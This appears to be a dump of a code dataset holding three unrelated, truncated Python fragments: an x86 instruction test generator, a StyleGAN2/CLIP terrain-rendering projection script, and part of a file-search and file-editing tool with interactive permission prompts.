input
stringlengths
2.65k
237k
output
stringclasses
1 value
return True; ## @} def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult): """ Generate one standard instr greg,greg test. """ oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,)); if iOp1X != iOp2X: oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],)); self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),)); _ = cbMaxOp; return True; def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput): """ High 8-bit registers are a real pain! """ assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2); # Figure out the register indexes of the max op sized regs involved. iOp1X = iOp1 & 3; iOp2X = iOp2 & 3; oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,)); # Calculate unshifted result. if iOp1X != iOp2X: uCur = oGen.auRegValues[iOp1X]; if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8); else: uCur = uInput; if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8); else: uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8); uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen); # Rotate the input and/or result to match their max-op-sized registers. if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8); if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1): uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8); # Hand it over to an overridable worker method. return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult); def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult): """ Generate mode 0, 1 and 2 test for the R/M=iOp2. """ if cAddrBits == 16: _ = cbMaxOp; else: iMod = 0; # No disp, except for i=5. oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); if iOp2 != 5 and iOp2 != 13: iMod = 1; for offDisp in oGen.getDispForMod(iMod): oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); iMod = 2; for offDisp in oGen.getDispForMod(iMod): oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp); self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),)); return True; def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913 iBaseReg, iIndexReg, iScale, uInput, uResult): """ Generate one SIB variations. """ for offDisp in oGen.getDispForMod(iMod, cbEffOp): if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0): if iIndexReg == 4: if cAddrBits == 64: continue; # skipping. oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput); self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1); else: oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp); self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iIndexReg); else: oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n'); if iIndexReg == 4: self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp); self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iBaseReg); else: if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1): if offDisp < 0: offDisp += 1; else: offDisp -= 1; self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg, iIndexReg, iScale, uInput, offDisp); self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen); sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg); oGen.pushConst(uResult); oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,)); _ = cbMaxOp; return True; def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs): """ Generate all SIB variations for the given iOp1 (reg) value. """ assert cAddrBits in [32, 64]; i = oGen.cSibBasePerRun; while i > 0: oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8); if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm. continue; j = oGen.getSibIndexPerRun(); while j > 0: oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8); if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. for iMod in [0, 1, 2]: if oGen.iSibBaseReg == iOp1 \ and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \ and cAddrBits != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. for _ in oGen.oSibScaleRange: oGen.iSibScale *= 2; if oGen.iSibScale > 8: oGen.iSibScale = 1; for uInput in auInputs: oGen.newSubTest(); uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen); self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale, uInput, uResult); j -= 1; i -= 1; return True; def generateStandardTests(self, oGen): """ Generate standard tests. """ # Parameters. cbDefOp = oGen.oTarget.getDefOpBytes(); cbMaxOp = oGen.oTarget.getMaxOpBytes(); auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen); auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True); iLongOp1 = oGen.oTarget.randGRegNoSp(); iLongOp2 = oGen.oTarget.randGRegNoSp(); # Register tests if self.fTestRegForm: for cbEffOp in self.acbOpVars: if cbEffOp > cbMaxOp: continue; oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp)); if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny: oOp2Range = [iLongOp2,]; oGen.write('; cbEffOp=%u\n' % (cbEffOp,)); for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)): if iOp1 == X86_GREG_xSP: continue; # Cannot test xSP atm. for iOp2 in oOp2Range: if (iOp2 >= 16 and iOp1 in range(4, 16)) \ or (iOp1 >= 16 and iOp2 in range(4, 16)): continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL. if iOp2 == X86_GREG_xSP: continue; # Cannot test xSP atm. oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp)); for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs): oGen.newSubTest(); if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2): uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput; uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen); self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15, uInput, uResult); else: self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput); # Memory test. if self.fTestMemForm: for cAddrBits in oGen.oTarget.getAddrModes(): for cbEffOp in self.acbOpVars: if cbEffOp > cbMaxOp: continue; for _ in oGen.getModRegRange(cbEffOp): oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp); if oGen.iModReg == X86_GREG_xSP: continue; # Cannot test xSP atm. if oGen.iModReg > 15: continue; ## TODO AH,CH,DH,BH auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs; for _ in oGen.oModRmRange: oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8); if oGen.iModRm != 4 or cAddrBits == 16: for uInput in auInputs: oGen.newSubTest(); if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \ and oGen.iModRm != 13 and cbEffOp != cbMaxOp: continue; # Don't know the high bit of the address ending up the result - skip it for now. uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen); self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, oGen.iModRm, uInput, uResult); else: # SIB - currently only short list of inputs or things may get seriously out of hand. self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs); return True; def generateTest(self, oGen, sTestFnName): oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,)); self.generateStandardTests(oGen); oGen.write(' ret\n'); oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,)); return True; class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg): """ Tests MOV Gv,Ev. """ def __init__(self): InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov); @staticmethod def calc_mov(cbEffOp, uInput, uCur, oGen): """ Calculates the result of a mov instruction.""" if cbEffOp == 8: return uInput & UINT64_MAX; if cbEffOp == 4: return uInput & UINT32_MAX; if cbEffOp == 2: return (uCur & 0xffffffffffff0000) | (uInput & UINT16_MAX); assert cbEffOp == 1; _ = oGen; return (uCur & 0xffffffffffffff00) | (uInput & UINT8_MAX); class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg): """ Tests MOVSXD Gv,Ev. """ def __init__(self): InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]); self.fTestMemForm = False; # drop this... def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen): """ Writes the instruction with two general registers as operands. """ if cbEffOp == 8: oGen.write(' movsxd %s, %s\n' % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp / 2),)); else: oGen.write(' oddmovsxd %s, %s\n' % ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),)); return True; def isApplicable(self, oGen): return oGen.oTarget.is64Bit(); @staticmethod def calc_movsxd(cbEffOp, uInput, uCur, oGen): """ Calculates the result of a movxsd instruction. Returns the result value (cbMaxOp sized). """ _ = oGen; if cbEffOp == 8 and (uInput & RT_BIT_32(31)): return (UINT32_MAX << 32) | (uInput & UINT32_MAX); if cbEffOp == 2: return (uCur
<reponame>igg002/stylegan2-ada-pytorch<gh_stars>0 # Experimental Version # # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # # NVIDIA CORPORATION and its licensors retain all intellectual property # and proprietary rights in and to this software, related documentation # and any modifications thereto. Any use, reproduction, disclosure or # distribution of this software and related documentation without an express # license agreement from NVIDIA CORPORATION is strictly prohibited. import copy import os from time import perf_counter import click import imageio import torch import torch.nn.functional as F import numpy as np import PIL.Image import clip import dnnlib import legacy from pytorch3d.io import load_obj from pytorch3d.structures import Meshes from pytorch3d.renderer import ( look_at_view_transform, FoVPerspectiveCameras, DirectionalLights, Materials, RasterizationSettings, MeshRenderer, MeshRasterizer, SoftPhongShader, TexturesUV, ) image_mean = torch.tensor([0.48145466, 0.4578275, 0.40821073]).cuda() image_std = torch.tensor([0.26862954, 0.26130258, 0.27577711]).cuda() def spherical_dist_loss(x: torch.Tensor, y: torch.Tensor): ''' Original code by <NAME>, copied from https://github.com/afiaka87/clip-guided-diffusion/blob/main/cgd/losses.py ''' x = F.normalize(x, dim=-1) y = F.normalize(y, dim=-1) return (x - y).norm(dim=-1).div(2).arcsin().pow(2).mul(2) #---------------------------------------------------------------------------- def project( G, target_image: torch.Tensor, # [C,H,W] and dynamic range [0,255], W & H must match G output resolution target_text, *, num_steps = 512, w_avg_samples = 8192, initial_learning_rate = 0.1, initial_latent = None, initial_noise_factor = 0.01, lr_rampdown_length = 0.25, lr_rampup_length = 0.5, noise_ramp_length = 0.5, max_noise = 0.5, regularize_noise_weight = 0.0, verbose = False, use_w_only = False, use_cosine_dist = True, use_spherical_dist = False, is_16_bit = False, device: torch.device ): if target_image is not None: assert target_image.shape[1:] == (G.img_resolution, G.img_resolution) assert use_cosine_dist or use_spherical_dist def logprint(*args): if verbose: print(*args) G = copy.deepcopy(G).eval().requires_grad_(False).to(device) # type: ignore # Compute w stats. logprint(f'Computing W midpoint and stddev using {w_avg_samples} samples...') z_samples = np.random.randn(w_avg_samples, G.z_dim) labels = None if (G.mapping.c_dim): labels = torch.from_numpy(0.5*np.random.randn(w_avg_samples, G.mapping.c_dim)).to(device) w_samples = G.mapping(torch.from_numpy(z_samples).to(device), labels) # [N, L, C] w_samples = w_samples.cpu().numpy().astype(np.float32) # [N, L, C] w_samples_1d = w_samples[:, :1, :].astype(np.float32) w_avg = np.mean(w_samples, axis=0, keepdims=True) # [1, L, C] w_std = (np.sum((w_samples - w_avg) ** 2) / w_avg_samples) ** 0.5 std_dev = np.std(w_samples) if initial_latent is not None: w_avg = initial_latent if w_avg.shape[1] == 1 and not use_w_only: w_avg = np.tile(w_avg, (1, G.mapping.num_ws, 1)) # Setup noise inputs. noise_bufs = { name: buf for (name, buf) in G.synthesis.named_buffers() if 'noise_const' in name } # Load CLIP model, transform = clip.load("ViT-B/16", device=device) # Features for target image. if target_image is not None: target_images = target_image.unsqueeze(0).to(device).to(torch.float32) if target_images.shape[2] > 224: target_images = F.interpolate(target_images, size=(224, 224), mode='area') # target_images = F.interpolate(target_images, size=(256, 256), mode='area') # target_images = target_images[:, :, 16:240, 16:240] # 256 -> 224, center crop with torch.no_grad(): clip_target_features = model.encode_image(((target_images / 255.0) - image_mean[None, :, None, None]) / image_std[None, :, None, None]).float() # Set render properties. batch_size = 8 dist = 2.5 raster_image_size = 224 sigma = 0 # 1e-7 faces_per_pixel = 20 # Initialize cameras. elev = torch.linspace(30, 150, batch_size) azim = torch.linspace(-180, 180, batch_size) R, T = look_at_view_transform(dist=dist, elev=elev, azim=azim) cameras = FoVPerspectiveCameras(device=device, R=R, T=T, fov=60.0, znear=0.1) # Initialize lights. lights = DirectionalLights(device=device) # Initialize materials. materials = Materials( device=device, shininess=1.0 ) # Initialize raster settings. raster_settings = RasterizationSettings( image_size=raster_image_size, blur_radius=np.log(1. / 1e-4 - 1.) * sigma, faces_per_pixel=faces_per_pixel, ) # Define renderer. renderer = MeshRenderer( rasterizer=MeshRasterizer( cameras=cameras, raster_settings=raster_settings ), shader=SoftPhongShader( device=device, cameras=cameras, lights=lights ) ) # Load base model. grid_path = 'grid.obj' # TEMP verts, faces, aux = load_obj(grid_path) verts_uvs = aux.verts_uvs[None, ...].to(device) # (1, V, 2) faces_uvs = faces.textures_idx[None, ...].to(device) # (1, F, 3) texture_image = torch.full([1, 513, 513, 3], 1.0, device=device) base_mesh = Meshes(verts=[verts], faces=[faces.verts_idx]).to(device) base_mesh.textures = TexturesUV(verts_uvs=verts_uvs, faces_uvs=faces_uvs, maps=texture_image) height_multiplier_initial = 0.5 height_multiplier = torch.tensor(height_multiplier_initial, requires_grad=True, device=device) render_frames = [] if use_w_only: w_avg = np.mean(w_avg, axis=1, keepdims=True) w_opt = torch.tensor(w_avg, dtype=torch.float32, device=device, requires_grad=True) # pylint: disable=not-callable w_out = torch.zeros([num_steps] + list(w_opt.shape[1:]), dtype=torch.float32, device=device) optimizer = torch.optim.Adam([w_opt, height_multiplier] + list(noise_bufs.values()), betas=(0.9, 0.999), lr=initial_learning_rate) # optimizer = madgrad.MADGRAD([w_opt] + list(noise_bufs.values()), lr=initial_learning_rate) # optimizer = SM3.SM3([w_opt] + list(noise_bufs.values()), lr=initial_learning_rate) # Init noise. for buf in noise_bufs.values(): buf[:] = torch.randn_like(buf) buf.requires_grad = True for step in range(num_steps): # Learning rate schedule. t = step / num_steps w_noise_scale = max_noise * w_std * initial_noise_factor * max(0.0, 1.0 - t / noise_ramp_length) ** 2 lr_ramp = min(1.0, (1.0 - t) / lr_rampdown_length) lr_ramp = 0.5 - 0.5 * np.cos(lr_ramp * np.pi) lr_ramp = lr_ramp * min(1.0, t / lr_rampup_length) lr = initial_learning_rate * lr_ramp for param_group in optimizer.param_groups: param_group['lr'] = lr # Synth images from opt_w. w_noise = torch.randn_like(w_opt) * w_noise_scale ws = w_opt + w_noise if use_w_only: ws = ws.repeat([1, G.mapping.num_ws, 1]) G_outputs = G.synthesis(ws, noise_mode='const') # Create a terrain mesh with the generated heightmap applied to. offset = (G_outputs + 1) / 2 offset = F.interpolate(offset, (513, 513), mode='area') * height_multiplier offset = offset.permute(0, 2, 3, 1)[0].flatten().unsqueeze(-1) offset = F.pad(input=offset, pad=(0, 2), mode='constant', value=0) offset = offset[:, [1, 0, 2]] mesh = base_mesh.offset_verts(offset) mesh = mesh.extend(batch_size) # Render the terrain mesh. rendered = renderer(mesh, materials=materials) synth_images = rendered[:, :, :, :3].permute(0, 3, 1, 2) render_frames.append(rendered) # TEMP synth_images = (synth_images - image_mean[None, :, None, None]) / image_std[None, :, None, None] dist = 0 cosine_sim_loss_image, cosine_sim_loss_text = 0, 0 spherical_loss_image, spherical_loss_text = 0, 0 # adj_center = 2.0 if target_image is not None: # Cosine Similarity if use_cosine_dist: generated_encoded = model.encode_image(synth_images).float() cosine_sim = torch.cosine_similarity(clip_target_features, generated_encoded, dim=-1).mean() # cosine_sim_loss_image = 1 - cosine_sim cosine_sim_loss_image = -1 * cosine_sim dist += cosine_sim_loss_image # Spherical Distance if use_spherical_dist: generated_encoded = model.encode_image(synth_images).float() spherical_loss_image = spherical_dist_loss(generated_encoded.unsqueeze(0), clip_target_features.unsqueeze(0)).sum() dist += spherical_loss_image # # Original # clip_dist = (clip_target_features - model.encode_image(synth_images).float()).square().sum() # dist += F.relu(0.5 + adj_center * clip_dist - min_threshold) if target_text is not None: # Cosine Similarity if use_cosine_dist: cosine_sim = (model(synth_images, target_text)[0] / 100).sum() # cosine_sim = torch.cosine_similarity(model.encode_text(target_text).float(), model.encode_image(synth_images).float(), dim=-1).mean() # cosine_sim_loss_text = 1 - cosine_sim cosine_sim_loss_text = -1 * cosine_sim dist += cosine_sim_loss_text # Spherical Distance if use_spherical_dist: generated_encoded = model.encode_image(synth_images).float() txt_encoded = model.encode_text(target_text).float() spherical_loss_text = spherical_dist_loss(generated_encoded.unsqueeze(0), txt_encoded.unsqueeze(0)).sum() dist += spherical_loss_text # # Original # clip_text = 1 - model(clip_synth_image, target_text)[0].sum() / 100 # dist += 2 * F.relu(adj_center * clip_text * clip_text - min_threshold / adj_center) # Noise regularization. reg_loss = 0.0 for v in noise_bufs.values(): noise = v[None,None,:,:] # must be [1,1,H,W] for F.avg_pool2d() while True: reg_loss += (noise*torch.roll(noise, shifts=1, dims=3)).mean()**2 reg_loss += (noise*torch.roll(noise, shifts=1, dims=2)).mean()**2 if noise.shape[2] <= 8: break noise = F.avg_pool2d(noise, kernel_size=2) loss = dist + reg_loss * regularize_noise_weight # Step optimizer.zero_grad(set_to_none=True) loss.backward() optimizer.step() logprint(f'step {step+1:>4d}/{num_steps}: loss {float(loss):<5.2f} dist {dist:<4.2f} c_loss_text {cosine_sim_loss_text:<4.2f} s_loss_text {spherical_loss_text:<4.2f} reg_loss {reg_loss * regularize_noise_weight:<4.2f} height_multiplier {height_multiplier:<4.2f}') # Save projected W for each optimization step. w_out[step] = w_opt.detach()[0] # Normalize noise. with torch.no_grad(): for buf in noise_bufs.values(): buf -= buf.mean() buf *= buf.square().mean().rsqrt() return w_out, render_frames #---------------------------------------------------------------------------- @click.command() @click.option('--network', 'network_pkl', help='Network pickle filename', required=True) @click.option('--target-image', 'target_fname', help='Target image file to project to', required=False, metavar='FILE', default=None) @click.option('--target-text', help='Target text to project to', required=False, default=None) @click.option('--initial-latent', help='Initial latent', default=None) @click.option('--lr', help='Learning rate', type=float, default=0.3, show_default=True) @click.option('--num-steps', help='Number of optimization steps', type=int, default=300, show_default=True) @click.option('--seed', help='Random seed', type=int, default=303, show_default=True) @click.option('--save-video', help='Save an mp4 video of optimization progress', type=bool, default=True, show_default=True) @click.option('--outdir', help='Where to save the output images', required=True, metavar='DIR') @click.option('--use-cosine-dist', help='Use cosine distance when calculating the loss', type=bool, default=True, show_default=True) @click.option('--use-spherical-dist', help='Use spherical distance when calculating the loss', type=bool, default=False, show_default=True) @click.option('--16bit', 'is_16_bit', help='Set to true if the network is trained to output 16-bit images', type=bool, default=False, show_default=True) @click.option('--use-w-only', help='Project into w space instead of w+ space', type=bool, default=False, show_default=True) def run_projection( network_pkl: str, target_fname: str, target_text: str, initial_latent: str, lr: float, num_steps: int, seed: int, save_video: bool, outdir: str, use_cosine_dist: bool, use_spherical_dist: bool, is_16_bit: bool, use_w_only: bool, ): """Project given image to the latent space of pretrained network pickle using CLIP. Examples: \b python clip_search.py --outdir=out --target-text='An image of an apple.' \\ --network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/ffhq.pkl """ # Set seed value np.random.seed(seed) torch.manual_seed(seed) # Load networks. print(f'Loading networks from {network_pkl}...') device = torch.device('cuda') with dnnlib.util.open_url(network_pkl) as fp: G = legacy.load_network_pkl(fp)['G_ema'].requires_grad_(False).to(device) # type: ignore # Load target image. target_image = None if target_fname: target_pil = PIL.Image.open(target_fname).convert('RGB').filter(PIL.ImageFilter.SHARPEN) w, h = target_pil.size s = min(w, h) target_pil = target_pil.crop(((w - s) // 2, (h - s) // 2, (w + s) // 2, (h + s) // 2)) target_pil
ask_permission: bool, default True. If True, gives an interactive prompt so that the user can manually choose which changes in the resultset should be made. overwrite: bool, default True. If False, create a new file rather than overwriting the original. If the last FileReader in this GorpHandler was looking at (file|dir)names, this will rename all the files and directories in the resultset, pending user input. Otherwise, this will apply replacement_func to all the locations in those files that were found by the query.""" from .jsonpath import JsonPathError, compressed_obj_repr def mutate_file(obj, path, func, ask_permission=False, **kwargs): """Mutates a nested iterable object in-place by applying func to obj[path]. obj: an object containing arbitrarily nested iterables. path: a tuple of keys or indices to follow through the object. func: a function to apply to the child found at the end of the path. ask_permission: if True, ask before changing the node. Useful when this is called repeatedly by other functions. Returns: None.""" level = kwargs.get("level", 0) if level == len(path): if not hasattr(func, "__call__"): out = func else: out = func(obj) if ask_permission: print( "At path {p},\n{obj_short}\n would be replaced by\n{out_short}.".format( p=path, obj_short=compressed_obj_repr(obj), out_short=compressed_obj_repr(out), ) ) decision = input("Do you want to do this? (y/n) ") if decision == "y": return out else: next_decision = input( "Do you want to stop editing this file? (y/n) " ) if next_decision == "y": raise JsonPathError("mutate_file halted at user request.") return obj return out obj[path[level]] = mutate_file( obj[path[level]], path, func, ask_permission, level=level + 1 ) if level != 0: return obj def mutate_file_repeatedly(obj, paths, func, ask_permission=False): """See mutate_file. This applies the func to obj[path] for each path in paths (by which we mean line numbers, or (page, line) tuples, or json paths).""" for ii, p in enumerate(paths): if not is_iterable(p): p = (p,) try: mutate_file(obj, p, func, ask_permission) except Exception as ex: if "halted at user request" in repr(ex): return False raise JsonPathError(ex) if ask_permission and ii < len(paths) - 1: ask_permission = ( input( "There are {numpaths} locations in this file that may be changed. Do you still want to be asked permission? (y/n) ".format( numpaths=len(paths) - ii - 1 ) ) == "y" ) return True for ii, (fname, paths) in enumerate(self.resultset.items()): if {"f", "a", "d"} & self.options[-1]: # these all look at (file|dir)names only, so the -u option with one of # these options should only change the (file|dir)name. new_fname = replacement_func(fname) decision = "n" if ask_permission: decision = input( (f"{fname} will be renamed to {new_fname}." " Is that OK?\n") ) if (not ask_permission) or (decision == "y"): try: os.rename(fname, new_fname) except Exception as ex: raise ex pass else: use_yaml = "y" in self.options[-1] if use_yaml: try: import yaml except: warn_first_import_error("yaml") use_yaml = False # process the text in fname in some appropriate way if ask_permission: print(f"Now editing {fname}.") with open(fname) as f: if "j" in self.options[-1]: processed_text = json.load(f) elif use_yaml: processed_text = list(yaml.safe_load_all(f)) is_single_doc = False if len(processed_text) == 1: processed_text = processed_text[0] is_single_doc = True else: processed_text = re.split("\r?\n", f.read()) edit_file = mutate_file_repeatedly( obj=processed_text, paths=paths, func=replacement_func, ask_permission=ask_permission, ) if edit_file: if overwrite: write_to_name = fname else: write_to_name = increment_name(fname) with open(write_to_name, "w") as f: if "j" in self.options[-1]: json.dump(processed_text, f) elif use_yaml: if is_single_doc: yaml.safe_dump(processed_text, f) else: yaml.safe_dump_all(processed_text, f) else: f.write("\n".join(processed_text)) if ask_permission and ii < len(self.resultset) - 1: ask_permission = ( input( f"There are {len(self.resultset)-ii-1} files remaining that may be edited. Do you still want to be asked permission? (y/n) " ) == "y" ) if ask_permission: quit_decision = input("Do you want to stop editing files? (y/n) ") if quit_decision == "y": return def generateFileSet(fname: str, d=False, r=False): """fname: the name of a file or directory. d: Boolean. If true, only yield directories. r: Boolean. If true, recursively search subdirectories of fname for files. Returns: a generator that yields names of directories or files, as per d and r. """ fname = os.path.abspath(fname) if os.path.isfile(fname): yield fname else: if r: if d: for root, dirs, files in os.walk(fname): root = os.path.relpath(root, fname) if root == ".": root = "" GorpLogger.info(f"in generateFileSet (r and d), root = {root}") for Dir in dirs: yield os.path.join(root, Dir) else: for root, dirs, files in os.walk(fname): root = os.path.relpath(root, fname) if root == ".": root = "" GorpLogger.info(f"in generateFileSet (r and not d), root = {root}") for file in files: yield os.path.join(root, file) else: for file in os.listdir(fname): GorpLogger.info(f"in generateFileSet (not r), file = {file}") if d and not os.path.isdir(os.path.join(fname, file)): continue yield file class FileReader: """Handles a single subquery, filtering a set of files based on filenames or text matching a regex. These should only be created by a GorpHandler. *options*: a tuple of options. *regex*: a string (regex, gorp.jsonpath query, XPath, or CSS selector) *files*: a list of files or filename. *handler*: the GorpHandler that spawned it.""" def __init__(self, options, regex, files, handler: GorpHandler): # bad_text_files.add("rerjeu.2py") self.handler = handler self.options = options self.regex = regex self.a = "a" in self.options self.b = "b" in self.options # read raw bytes of any file if self.b: regex = regex.encode() self.regex = regex self.docx = ("docx" in self.options) and (not import_warnings["docx"][0]) self.pdf = ("pdf" in self.options) and (not import_warnings["pdfminer"][0]) self.xl = ("xl" in self.options) and (not import_warnings["openpyxl"][0]) self.c = "c" in self.options self.d = "d" in self.options self.e = "e" in self.options self.f = "f" in self.options self.g = "g" in self.options self.h = "h" in self.options self.i = "i" in self.options self.j = "j" in self.options # self.k = ('k' in self.options) # a post-processing option used on the final resultset self.l = "l" in self.options self.m = [x for x in self.options if x[0] == "m" and x != "mv"] if self.m: m = self.m[0] try: comparator, modtime = re.findall("([<>=]=?)(.+)", m)[0] compare_func = {**binops, "=": binops["=="]}[comparator] self.modtime_filter = lambda x: compare_func(str(x), modtime) except: self.modtime_filter = lambda x: True self.n = "n" in self.options self.o = "o" in self.options # self.p = ('p' in self.options) # see self.k comment # self.q = ('q' in self.options) self.r = "r" in self.options self.s = [x for x in self.options if x[0] == "s" and x != "sed"] if self.s: s = self.s[0] try: comparator, size = re.findall("([<>=]=?)(.+)", s)[0] size = byteform_to_num(size) compare_func = {**binops, "=": binops["=="]}[comparator] self.size_filter = lambda x: compare_func(x, size) except: self.size_filter = lambda x: True # self.t = ('t' in self.options) # see self.k self.tab = "tab" in self.options # self.u = ('u' in self.options) # see self.k self.v = "v" in self.options self.w = "w" in self.options self.x = ("x" in self.options) and not import_warnings["lxml"][0] self.y = ("y" in self.options) and not import_warnings["yaml"][0] # self.z = ('z' in self.options) # see self.k # print(f'{self.m = }, {self.s = }, {self.r = }') self.numarg = None for opt in self.options: try: self.numarg = int(opt) except Exception as ex: # if not "invalid literal for int(" in repr(ex): # GorpLogger.error(ex) continue if self.j or 